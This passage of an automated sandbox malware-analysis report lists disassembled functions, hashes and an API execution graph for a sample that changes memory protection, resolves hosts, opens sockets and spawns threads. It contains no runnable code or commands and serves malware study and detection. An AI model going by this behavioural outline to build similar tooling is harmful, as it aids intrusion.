                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  • Opcode ID: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                  • Instruction ID: fbe174005d69523103c40687462872883b2a849454bbf419938160b7b3bbf122
                                  • Opcode Fuzzy Hash: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                  • Instruction Fuzzy Hash: AD514B75740205BBEF14EB18DC85FA673A9AF94710F218229FD48DB287D969EC4287D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007714C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 0079EA22
                                    • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 0077146B
                                    • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 00771490
                                  • ___swprintf_l.LIBCMT ref: 0077156D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                  • Instruction ID: d3a778ee60efaa949fd91bc014b9dfe59e3c424b9fb95e479ac8a1f065700a8e
                                  • Opcode Fuzzy Hash: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                  • Instruction Fuzzy Hash: F721C1B29006199BDF24DE68DC45AEE73ACEB50740F848151FD4AD3141EB78AA688BE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007D3DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 74617fcbfa08c9a4f29d527634afd56ccac22082a7eb57c9708f23474936827b
                                  • Instruction ID: 29eec9e24567eb303c6f7147d9f79d7054caa961e8e7e1879f0427c415745506
                                  • Opcode Fuzzy Hash: 74617fcbfa08c9a4f29d527634afd56ccac22082a7eb57c9708f23474936827b
                                  • Instruction Fuzzy Hash: 5E2171B290022AABDB10AE659C459EF77BDAF18714F040526FD0497282E7B89F54C7E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007553A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007922F4
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
                                  • RTL: Resource at %p, xrefs: 0079230B
                                  • RTL: Re-Waiting, xrefs: 00792328
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-871070163
                                  • Opcode ID: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                  • Instruction ID: 617c8ec89938efa80c4a1cb6ff93843e3e6c22bb7d26e354bf558c5284d7d131
                                  • Opcode Fuzzy Hash: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                  • Instruction Fuzzy Hash: BD513B71600701BBDF10AB28DC85FE67398AF55764F114229FD08DB282E6A9ED468790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0075EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007924BD
                                  • RTL: Re-Waiting, xrefs: 007924FA
                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0079248D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                  • API String ID: 0-3177188983
                                  • Opcode ID: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                  • Instruction ID: ccecc2dcbb6b071fd3e107c012a6e81c582c39697ccf4ca897e8668307f5a3c1
                                  • Opcode Fuzzy Hash: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                  • Instruction Fuzzy Hash: 7D41D8B0600204FBDB24EB68DC89FAA77B9EF44710F208615F955D72D2D67CED528760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0076FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID:
                                  • API String ID: 3965848254-0
                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction ID: 3c123995bb8216e2d328b87d6bbdc2c6c000a0e32058bc97e5d35d372c73db28
                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction Fuzzy Hash: CF91D671E0020AEFDF24DF58D8456EEBBB4FF55304F24807AD842A7162E7395A51CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007E5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: $$0
                                  • API String ID: 1302938615-389342756
                                  • Opcode ID: 4beaf5e29e1591462d9b3bb46aa6f941306071a50b2db0de6fd35cf3dc8226e4
                                  • Instruction ID: 5b5e5360dc5f21a76ce88e20211e03c6e6e85db3367fa2854b88a9a5b785b0b3
                                  • Opcode Fuzzy Hash: 4beaf5e29e1591462d9b3bb46aa6f941306071a50b2db0de6fd35cf3dc8226e4
                                  • Instruction Fuzzy Hash: 5591A530D066CDDFDF25CFAAC8853EDBBB1AF49318F14465AD4A1AB291C7784A41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007AE759 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007AE893
                                  • ]x, xrefs: 007AE75B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcstoul
                                  • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]x
                                  • API String ID: 1097018459-3343864547
                                  • Opcode ID: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                  • Instruction ID: bd677a5325f568174c220776ac0db13bf5c9d48c7bc308bd63513658312d371a
                                  • Opcode Fuzzy Hash: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                  • Instruction Fuzzy Hash: D441B172C00249EADF10DFE4C885BEEB7B8AF86310F10966AF551A7081E77CDA94C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0076C558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0076C5BB
                                  • 1s, xrefs: 0076C56F
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: 1s${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                  • API String ID: 48624451-1946412030
                                  • Opcode ID: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                  • Instruction ID: 7ac45f81307a6df3911eb3b7c5e6960220cc8496fe21478108cd81518d30aade
                                  • Opcode Fuzzy Hash: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                  • Instruction Fuzzy Hash: 100161A60085B065D72187AB4C11832FBF99FCEA15728C08EF6D98A296E17FC542D770
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007AE8DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcstoul.LIBCMT ref: 007AE901
                                    • Part of subcall function 007E5AA6: __cftof.LIBCMT ref: 007E5AB6
                                  Strings
                                  • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007AE91B
                                  • ]x, xrefs: 007AE8E3
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __cftof_wcstoul
                                  • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]x
                                  • API String ID: 1831096779-1492471241
                                  • Opcode ID: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                  • Instruction ID: 8c3ae768993fb968cd615eb077720415bb297a59bf99a083496460f99a0ec5ba
                                  • Opcode Fuzzy Hash: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                  • Instruction Fuzzy Hash: E4F0F637140208BADB142A55DC07E9B77ACDFD5B20F008219FA059A092EAB9EA0087A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:2.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:457
                                  Total number of Limit Nodes:18
                                  execution_graph 13761 8080e0a 13762 807f942 13761->13762 13763 8080e45 NtProtectVirtualMemory 13762->13763 13764 8080e70 13763->13764 13654 807ff82 13656 807ffb8 13654->13656 13655 8080022 13656->13655 13659 8080081 13656->13659 13666 807c5b2 13656->13666 13658 8080134 13658->13655 13662 80801b2 13658->13662 13669 807c732 13658->13669 13659->13655 13659->13658 13661 8080117 getaddrinfo 13659->13661 13661->13658 13662->13655 13672 807c6b2 13662->13672 13664 80807f4 setsockopt recv 13664->13655 13665 8080729 13665->13655 13665->13664 13667 807c5ec 13666->13667 13668 807c60a socket 13666->13668 13667->13668 13668->13659 13670 807c76a 13669->13670 13671 807c788 connect 13669->13671 13670->13671 13671->13662 13673 807c6e7 13672->13673 13674 807c705 send 13672->13674 13673->13674 13674->13665 13811 8081a4d 13812 8081a53 13811->13812 13815 8075782 13812->13815 13814 8081a6b 13816 807578f 13815->13816 13817 80757ad 13816->13817 13818 807a662 6 API calls 13816->13818 13817->13814 13818->13817 13914 807914a 13915 8079153 13914->13915 13920 8079174 13914->13920 13916 807b382 2 API calls 13915->13916 13918 807916c 13916->13918 13917 80791e7 13919 80740f2 6 API calls 13918->13919 13919->13920 13920->13917 13922 80741f2 13920->13922 13923 807420f 13922->13923 13927 80742c9 13922->13927 13924 807ef12 7 API calls 13923->13924 13926 8074242 13923->13926 13924->13926 13925 8074289 13925->13927 13928 80740f2 6 API calls 13925->13928 13926->13925 13929 8075432 NtCreateFile 13926->13929 13927->13920 13928->13927 13929->13925 13839 8079cd4 13841 8079cd8 13839->13841 13840 807a022 13841->13840 13845 8079352 13841->13845 13843 8079f0d 13843->13840 13854 8079792 13843->13854 13846 807939e 13845->13846 13847 80794ec 13846->13847 13849 8079595 13846->13849 13853 807958e 13846->13853 13848 807f232 NtCreateFile 13847->13848 13851 80794ff 13848->13851 13850 807f232 NtCreateFile 13849->13850 13849->13853 13850->13853 13852 807f232 NtCreateFile 13851->13852 13851->13853 13852->13853 13853->13843 13855 80797e0 13854->13855 13856 807f232 NtCreateFile 13855->13856 13858 807990c 13856->13858 13857 8079af3 13857->13843 13858->13857 13859 8079352 NtCreateFile 13858->13859 13860 8079602 NtCreateFile 13858->13860 13859->13858 13860->13858 13765 8075613 13766 8075620 13765->13766 13767 8075684 13766->13767 13768 8080e12 NtProtectVirtualMemory 13766->13768 13768->13766 13769 8081a1f 13770 8081a25 13769->13770 13773 80755f2 13770->13773 13772 8081a3d 13774 807560e 13773->13774 13775 80755fb 13773->13775 13774->13772 13775->13774 13777 807a662 13775->13777 13778 807a66b 13777->13778 13783 807a7ba 13777->13783 13779 80740f2 6 API calls 13778->13779 13778->13783 13781 807a6ee 13779->13781 13780 807a750 13780->13783 13784 807a83f 13780->13784 13786 807a791 13780->13786 13781->13780 13782 807ff82 6 API calls 13781->13782 13782->13780 13783->13774 13784->13783 13785 807ff82 6 API calls 13784->13785 13785->13783 13786->13783 13787 807ff82 6 API calls 13786->13787 13787->13783 13675 8080e12 13676 8080e45 NtProtectVirtualMemory 13675->13676 13677 807f942 13675->13677 13678 8080e70 13676->13678 13677->13676 13679 80742dd 13682 807431a 13679->13682 13680 80743fa 13681 8074328 SleepEx 13681->13681 13681->13682 13682->13680 13682->13681 13686 807ef12 13682->13686 13695 8075432 13682->13695 13705 80740f2 13682->13705 13688 807ef48 13686->13688 13687 807f134 13687->13682 13688->13687 13689 807f0e9 13688->13689 13694 807f232 NtCreateFile 13688->13694 13711 807ff82 13688->13711 13690 807f125 13689->13690 13723 807e842 13689->13723 13731 807e922 13690->13731 13694->13688 13696 807545b 13695->13696 13704 80754c9 13695->13704 13697 807f232 NtCreateFile 13696->13697 13696->13704 13698 8075496 13697->13698 13699 80754c5 13698->13699 13743 8075082 13698->13743 13700 807f232 NtCreateFile 13699->13700 13699->13704 13700->13704 13702 80754b6 13702->13699 13752 8074f52 13702->13752 13704->13682 13706 8074109 13705->13706 13710 80741d3 13705->13710 13757 8074012 13706->13757 13708 8074113 13709 807ff82 6 API calls 13708->13709 13708->13710 13709->13710 13710->13682 13713 807ffb8 13711->13713 13712 8080022 13712->13688 13713->13712 13714 807c5b2 socket 13713->13714 13716 8080081 13713->13716 13714->13716 13715 8080134 13715->13712 13717 807c732 connect 13715->13717 13719 80801b2 13715->13719 13716->13712 13716->13715 13718 8080117 getaddrinfo 13716->13718 13717->13719 13718->13715 13719->13712 13720 807c6b2 send 13719->13720 13722 8080729 13720->13722 13721 80807f4 setsockopt recv 13721->13712 13722->13712 13722->13721 13724 807e86d 13723->13724 13739 807f232 13724->13739 13726 807e906 13726->13689 13727 807e888 13727->13726 13728 807ff82 6 API calls 13727->13728 13729 807e8c5 13727->13729 13728->13729 13729->13726 13730 807f232 NtCreateFile 13729->13730 13730->13726 13732 807e9c2 13731->13732 13733 807f232 NtCreateFile 13732->13733 13735 807e9d6 13733->13735 13734 807ea9f 13734->13687 13735->13734 13736 807ea5d 13735->13736 13738 807ff82 6 API calls 13735->13738 13736->13734 13737 807f232 NtCreateFile 13736->13737 13737->13734 13738->13736 13740 807f25c 13739->13740 13742 807f334 13739->13742 13741 807f410 NtCreateFile 13740->13741 13740->13742 13741->13742 13742->13727 13744 8075420 13743->13744 13745 80750aa 13743->13745 13744->13702 13745->13744 13746 807f232 NtCreateFile 13745->13746 13748 80751f9 13746->13748 13747 80753df 13747->13702 13748->13747 13749 807f232 NtCreateFile 13748->13749 13750 80753c9 13749->13750 13751 807f232 NtCreateFile 13750->13751 13751->13747 13753 8074f70 13752->13753 13754 8074f84 13752->13754 13753->13699 13755 807f232 NtCreateFile 13754->13755 13756 8075046 13755->13756 13756->13699 13759 8074031 13757->13759 13758 80740cd 13758->13708 13759->13758 13760 807ff82 6 API calls 13759->13760 13760->13758 13861 8077edd 13863 8077f06 13861->13863 13862 8077fa4 13863->13862 13864 80748f2 NtProtectVirtualMemory 13863->13864 13865 8077f9c 13864->13865 13866 807b382 2 API calls 13865->13866 13866->13862 13977 8077dd9 13979 8077df0 13977->13979 13978 8077ecd 13979->13978 13980 807b382 2 API calls 13979->13980 13980->13978 13819 8081aa9 13820 8081aaf 13819->13820 13823 807c212 13820->13823 13822 8081ac7 13824 807c237 13823->13824 13825 807c21b 13823->13825 13824->13822 13825->13824 13827 807c0c2 13825->13827 13828 807c0cb 13827->13828 13830 807c1f0 13827->13830 13829 807ff82 6 API calls 13828->13829 13828->13830 13829->13830 13830->13824 13930 8076b66 13932 8076b6a 13930->13932 13931 8076cce 13932->13931 13933 8076cb5 CreateMutexW 13932->13933 13933->13931 13867 807c2e4 13868 807c36f 13867->13868 13869 807c305 13867->13869 13869->13868 13870 807c0c2 6 API calls 13869->13870 13870->13868 13490 8080bac 13491 8080bb1 13490->13491 13524 8080bb6 13491->13524 13525 8076b72 13491->13525 13493 8080c2c 13494 8080c85 13493->13494 13496 8080c69 13493->13496 13497 8080c54 13493->13497 13493->13524 13495 807eab2 NtProtectVirtualMemory 13494->13495 13500 8080c8d 13495->13500 13498 8080c6e 13496->13498 13499 8080c80 13496->13499 13501 807eab2 NtProtectVirtualMemory 13497->13501 13502 807eab2 NtProtectVirtualMemory 13498->13502 13499->13494 13503 8080c97 13499->13503 13561 8078102 13500->13561 13505 8080c5c 13501->13505 13506 8080c76 13502->13506 13507 8080c9c 13503->13507 13508 8080cbe 13503->13508 13547 8077ee2 13505->13547 13553 8077fc2 13506->13553 13529 807eab2 13507->13529 13511 8080cd9 13508->13511 13512 8080cc7 13508->13512 13508->13524 13517 807eab2 NtProtectVirtualMemory 13511->13517 13511->13524 13514 807eab2 NtProtectVirtualMemory 13512->13514 13516 8080ccf 13514->13516 13571 80782f2 13516->13571 13518 8080ce5 13517->13518 13589 8078712 13518->13589 13527 8076b93 13525->13527 13526 8076cce 13526->13493 13527->13526 13528 8076cb5 CreateMutexW 13527->13528 13528->13526 13531 807eadf 13529->13531 13530 807eebc 13539 8077de2 13530->13539 13531->13530 13601 80748f2 13531->13601 13533 807ee5c 13534 80748f2 NtProtectVirtualMemory 13533->13534 13535 807ee7c 13534->13535 13536 80748f2 NtProtectVirtualMemory 13535->13536 13537 807ee9c 13536->13537 13538 80748f2 NtProtectVirtualMemory 13537->13538 13538->13530 13540 8077df0 13539->13540 13542 8077ecd 13540->13542 13626 807b382 13540->13626 13543 8074412 13542->13543 13545 8074440 13543->13545 13544 8074473 13544->13524 13545->13544 13546 807444d CreateThread 13545->13546 13546->13524 13549 8077f06 13547->13549 13548 8077fa4 13548->13524 13549->13548 13550 80748f2 NtProtectVirtualMemory 13549->13550 13551 8077f9c 13550->13551 13552 807b382 2 API calls 13551->13552 13552->13548 13554 8078016 13553->13554 13557 80780bb 13554->13557 13558 80780f0 13554->13558 13559 80748f2 NtProtectVirtualMemory 13554->13559 13555 80780e8 13556 807b382 2 API calls 13555->13556 13556->13558 13557->13555 13560 80748f2 NtProtectVirtualMemory 13557->13560 13558->13524 13559->13557 13560->13555 13563 8078137 13561->13563 13562 80782d5 13562->13524 13563->13562 13564 80748f2 NtProtectVirtualMemory 13563->13564 13565 807828a 13564->13565 13566 80748f2 NtProtectVirtualMemory 13565->13566 13569 80782a9 13566->13569 13567 80782cd 13568 807b382 2 API calls 13567->13568 13568->13562 13569->13567 13570 80748f2 NtProtectVirtualMemory 13569->13570 13570->13567 13572 8078349 13571->13572 13573 807849f 13572->13573 13575 80748f2 NtProtectVirtualMemory 13572->13575 13574 80748f2 NtProtectVirtualMemory 13573->13574 13578 80784c3 13573->13578 13574->13578 13576 8078480 13575->13576 13577 80748f2 NtProtectVirtualMemory 13576->13577 13577->13573 13579 8078597 13578->13579 13580 80748f2 NtProtectVirtualMemory 13578->13580 13581 80748f2 NtProtectVirtualMemory 13579->13581 13582 80785bf 13579->13582 13580->13579 13581->13582 13585 80786b9 13582->13585 13587 80748f2 NtProtectVirtualMemory 13582->13587 13583 80786e1 13584 807b382 2 API calls 13583->13584 13586 80786e9 13584->13586 